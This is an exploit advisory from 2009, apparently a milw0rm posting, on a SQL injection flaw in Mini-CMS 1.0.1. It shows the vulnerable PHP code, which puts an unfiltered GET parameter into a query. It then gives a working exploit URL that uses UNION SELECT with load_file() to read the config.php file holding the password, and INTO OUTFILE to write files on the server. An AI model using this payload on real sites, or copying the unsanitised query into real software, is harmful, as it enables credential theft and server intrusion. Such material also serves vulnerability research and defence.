[+]--------------------------------------------------------------------------------------------------------------------[+]
[+]--------------------------------------------[Mini-CMS 1.0.1 SQL inlection]------------------------------------------[+]
[+]--------------------------------------------------------------------------------------------------------------------[+]
-[INFO]----------------------------------------------------------------------------------------------------------------[+]
[+] Title:Mini-CMS 1.0.1 SQL inlection
[+] Autor: Ins3t
[+] Site: www.arthacking.net
[+] Date:08.08.2009
[+]--------------------------------------------------------------------------------------------------------------------[+]
-[BUG INFO]------------------------------------------------------------------------------------------------------------[+]
[+] The vulnerability occurs due to insufficient filtering transferred database parameters. Password is not in the
database, and in the config.php file.
[+] Conditions: magic_quotes_gpc = Off | full patch of file config.php
[+] Code vulnerable functions:
[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]
<?php
$id = $_GET['id'];
database_connect();
$query = "SELECT * from content
WHERE id = $id"; <------(BUG)
$error = mysql_error();
if (!$result = mysql_query($query)) {
print "$error";
exit;
}
while($row = mysql_fetch_object($result)){
$content = $row->text;
print("$content");
}
?>
[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]
[+] Exploit:
[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]
http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+
[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]
# milw0rm.com [2009-08-10]
